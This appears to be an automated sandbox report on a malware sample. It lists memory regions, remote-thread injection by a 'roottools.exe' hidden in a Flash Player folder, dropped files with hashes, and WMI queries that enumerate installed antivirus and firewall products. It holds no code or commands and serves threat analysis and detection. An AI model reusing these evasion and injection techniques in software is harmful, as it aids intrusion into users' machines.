rasadhlp.dll	0x75300000	0x75305fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nlaapi.dll	0x75310000	0x7531ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasman.dll	0x75320000	0x75334fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rasapi32.dll	0x75340000	0x75391fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
schannel.dll	0x753a0000	0x753d9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
userenv.dll	0x753e0000	0x753f6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
dnsapi.dll	0x75400000	0x75443fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntmarta.dll	0x75450000	0x75470fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
profapi.dll	0x75480000	0x7548afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
comctl32.dll	0x75490000	0x7562dfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75630000	0x7566afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x75670000	0x75685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
secur32.dll	0x75690000	0x75697fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sensapi.dll	0x756a0000	0x756a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iphlpapi.dll	0x756b0000	0x756cbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rtutils.dll	0x756d0000	0x756dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
winnsi.dll	0x756e0000	0x756e6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x75800000	0x7580bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x75810000	0x7586ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x758c0000	0x759bffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x759c0000	0x75acffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
psapi.dll	0x75ad0000	0x75ad4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75ae0000	0x75c3bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
iertutil.dll	0x75c40000	0x75e3afff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x75e70000	0x75f1bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wininet.dll	0x75f20000	0x76014fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
clbcatq.dll	0x76020000	0x760a2fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x760b0000	0x7610ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x76110000	0x761acfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
oleaut32.dll	0x761b0000	0x7623efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x76240000	0x7635cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x76360000	0x7636bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x76370000	0x763c6fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76570000	0x7663bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76640000	0x76685fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
urlmon.dll	0x76690000	0x767c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x767d0000	0x767e8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
nsi.dll	0x767f0000	0x767f5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x76800000	0x768effff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x768f0000	0x768f9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x76900000	0x76944fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76950000	0x769dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wintrust.dll	0x76a40000	0x76a6cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shell32.dll	0x76a70000	0x776b9fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x77740000	0x777dffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ws2_32.dll	0x777e0000	0x77814fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x00000000778b0000	0x778b0000	0x779a9fff	Private Memory	Readable, Writable, Executable	Region Actions
private_0x00000000779b0000	0x779b0000	0x77acefff	Private Memory	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77ad0000	0x77c78fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77cb0000	0x77e2ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x000000007ef92000	0x7ef92000	0x7ef94fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef95000	0x7ef95000	0x7ef97fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef98000	0x7ef98000	0x7ef9afff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9b000	0x7ef9b000	0x7ef9dfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007ef9e000	0x7ef9e000	0x7efa0fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa1000	0x7efa1000	0x7efa3fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa4000	0x7efa4000	0x7efa6fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efa7000	0x7efa7000	0x7efa9fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efaa000	0x7efaa000	0x7efacfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efad000	0x7efad000	0x7efaffff	Private Memory	Readable, Writable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efd5000	0x7efd5000	0x7efd7fff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efd8000	0x7efd8000	0x7efdafff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions
For performance reasons, the remaining 69 entries are omitted. The remaining entries can be found in flog.txt.

Injection Information

Injection Type	Source Process	Source Os Thread ID	Injection Info	Count	Logfile
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x70000, size = 114688	1	Fn Data
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x876c4, size = 4	1	Fn Data
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x877d0, size = 4	1	Fn Data
Modify Memory	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x87d38, size = 4	1	Fn Data
Create Remote Thread	#15: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe	0x6a8	address = 0x795bc	1	Fn

Created Files

Filename	File Size	Hash Values	Actions
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\g[1].txt	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\ew[1].txt	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\jw[1].txt	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\0wqaga[1].txt	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\aetadzjz\appdata\local\temp\upde25b4796.exe	192.00 KB (196608 bytes)	MD5: 71c63dd6822598c7f7c7ab4c9ceb6ba9 SHA1: 854db67ad532a4af63443f8e6f684762e3c9efca SHA256: 99d542d87fc15670f0e353e1bcb788ed6cd05dc6464a3b011fa7af206ff6a083	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cab7a2e.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cab7a4f.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cab7a70.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\cab85a9.tmp	52.71 KB (53978 bytes)	MD5: 03f9e1f45c0d5fe8e08af7449ba1fa2f SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar7a2f.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar7a50.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar7a71.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\temp\tar85b9.tmp	126.77 KB (129813 bytes)	MD5: 4479a52b31b6bde89384fb63854ec382 SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt	0.27 KB (281 bytes)	MD5: 7372fbe29d49e31bd4002a12ff10b319 SHA1: b49450a4a7844b312769bd7ae0628aa1f0426efe SHA256: 1e52ee6f27cb7c984dc23b4cd48c641438fcff2a7dc3048b04fedc51476202c4	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt	48.62 KB (49787 bytes)	MD5: 5bce4a525f0d6dba211e09b60f144bf9 SHA1: 09f4d50cd2573e52623a19c40d987508d5c09bcb SHA256: eb192368bd6677a889c70e4225d709baa19c2ac38c07c8fe116ff0da59deae00	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\yylw[1].txt	0.23 KB (236 bytes)	MD5: 41f4b78b882df2ab9fdf5c2c60cc7c85 SHA1: 75d27da1d973a5d0bc1f246834e5e22591ca2732 SHA256: 905aa522a93e407c554a064d451edbd8f25f8afb70cbb0ab10d6a553aaeef1b6	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a6egg[1].txt	348.46 KB (356824 bytes)	MD5: f7ae0d06a19a33310f2b33a9b91a0916 SHA1: c35f57e13fb999aeb678c8117af70714e5f38e9c SHA256: 2d801bf8ce180123c447ef817c9385c298d1c08fb04a9f49042cd42e9e00f959	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\qfmq[1].txt	5.65 KB (5784 bytes)	MD5: ff63baf8441314e99b50f8e6205f2df8 SHA1: 1c5e1270872b75f9a1503ddc7bb22532257a8ed9 SHA256: 45b9ee8eb14ffc3692481095527cd8cc889b586f122ab5e43c0bb40ae390ef41	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\oa[1].txt	5.65 KB (5784 bytes)	MD5: ca0cc8ffcff1a13be2752132a8167d6b SHA1: 3c0265be2ab965bf0ebf9382717bef9b815bec36 SHA256: 48b849dc7205c10f1daf557ea8e05a633bb9646eb1da5da89aac17c02014c0ad	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\3q2naw[1].txt	3.15 KB (3224 bytes)	MD5: 5dee0de1d90631b1fb9a8de697045c67 SHA1: bb4d81d7b0352e350ac345ae367c58cd8049017a SHA256: c4da2e282d7bfa3faf20529d0e97b1baf05c41344e1da97a64e5ad96e1ec96f8	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt	156.73 KB (160492 bytes)	MD5: f0acdd87a868572d89fe58cc771a4f44 SHA1: e12103983b81e7c4e19c7e432ae0736a028024dd SHA256: 308880082e52bef445ba6ff2ac9fc91bceb550569768d2060114aa14a84a76fb	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\spsra[1].txt	200.17 KB (204972 bytes)	MD5: 9cbb4d0e76c226eb847c4ef1a8b0d39c SHA1: cff19e3d50f60e32157747873ba9e87cb1231de6 SHA256: f000b6a915fa937d682aa56bccc5b1c5c84df5c6de526a2ecb59a3399e4c49d6	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt	167.56 KB (171584 bytes)	MD5: e00b057f92a763e5b783ca24b94a26ce SHA1: c3b90637188b48431e1aea880a49393e669a300c SHA256: 998b2fd31f18b2a97a5ab0548f5ea02d71f1f6bf69800e9b2d5b98db16322c2f	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[2].txt	0.27 KB (279 bytes)	MD5: 90de1992ceb330537fee8db14d5fd987 SHA1: b05f7371ddbfc73d7393445bd8d52048289f0a4f SHA256: 6ea48ebb47ac6309a8a5d275563df6aaa2ad1a68f5a26dc2530d9a39ef9dd231	File Actions Show Properties Download
c:\users\aetadzjz\appdata\roaming\microsoft\windows\cookies\aetadzjz@google[1].txt	0.27 KB (278 bytes)	MD5: 7e2935c87edf38621c63511a6cc5e1e3 SHA1: 148686c9adafa08e6d55351479da7be5b0bcf064 SHA256: d08ddc5f3a9bb51961871f0b0a8c840adb5828c8a986f1a730e330fef876c44f	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\google_de[1].txt	48.62 KB (49791 bytes)	MD5: 9b930032eac8c180ed70390aee88903c SHA1: 843bfe71d4c57d9fe1e0c8d270603ea4bd5f269f SHA256: 888f2001ace08ab500701ae57772967f6b7df6b0c35a5472802077ef81289adb	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\q[1].txt	0.19 KB (192 bytes)	MD5: 309cd930b3d4df7998a5aeb8f61ab194 SHA1: 9fe5095d059406cd2f92d58b9ac148cd5897450c SHA256: fa3faba658be48400f8847bcf6f792362fbfd422ef8f80ba31ba4b02f346e609	File Actions Show Properties Download
c:\users\aetadzjz\appdata\local\microsoft\windows\temporary internet files\content.ie5\rijuql1c\a[1].txt	36.40 KB (37272 bytes)	MD5: 3ecca40e5dc9f0107f5d9ae500177878 SHA1: 947876a5a40257ba6da4021ad4bc8b5317dbdd03 SHA256: 5947ddcc53d38842b7e5bf1aaab70822f2982fe1859183304c2ebd3e5d2f72f0	File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\ietldcache\index.dat	256.00 KB (262144 bytes)	MD5: 8ed682d01fa076cced515bf6b21ba022 SHA1: e69667b35d101d9cd052697da198c40a88e16e74 SHA256: 4abb12ce35853bda9c190e84a3329ab50701e035b92436eba8f4ddf9b96e4e6c		File Actions Show Properties Download

Host Behavior

COM (18)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	WBEMLocator	IWbemLocator	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD, CLSCTX_NO_FAILURE_LOG	6	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = ROOT\SecurityCenter	1	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from AntiVirusProduct	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = ROOT\SecurityCenter2	3	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from AntiVirusProduct	1	Fn
Execute	WBEMLocator	IWbemLocator	method_name = ConnectServer, network_resource = ROOT\SecurityCenter	2	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from AntiSpywareProduct	2	Fn
Execute	WBEMLocator	IWbemServices	method_name = ExecQuery, query_language = WQL, query = Select * from FirewallProduct	2	Fn

File (75)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	3	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	2	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\Microsoft OneDrive.rig	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
Create Pipe	pipe\d3b6c4de8cf79a854b549ee232f08c89	open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255	1	Fn
Create Pipe	\device\namedpipe\d3b6c4de8cf79a854b549ee232f08c89	open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_OVERLAPPED, max_instances = 255	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.tmp	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = file_attributes	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 0	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	3	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe	type = size, size_out = 196608	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	1	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	type = size, size_out = 1776	2	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys	type = file_attributes	10	Fn
Get Info	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\SJpF7mOw3gFdA.hin	type = size, size_out = 0	1	Fn
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	2	Fn Data
Read	C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv	size = 1776, size_out = 1776	1	Fn Data
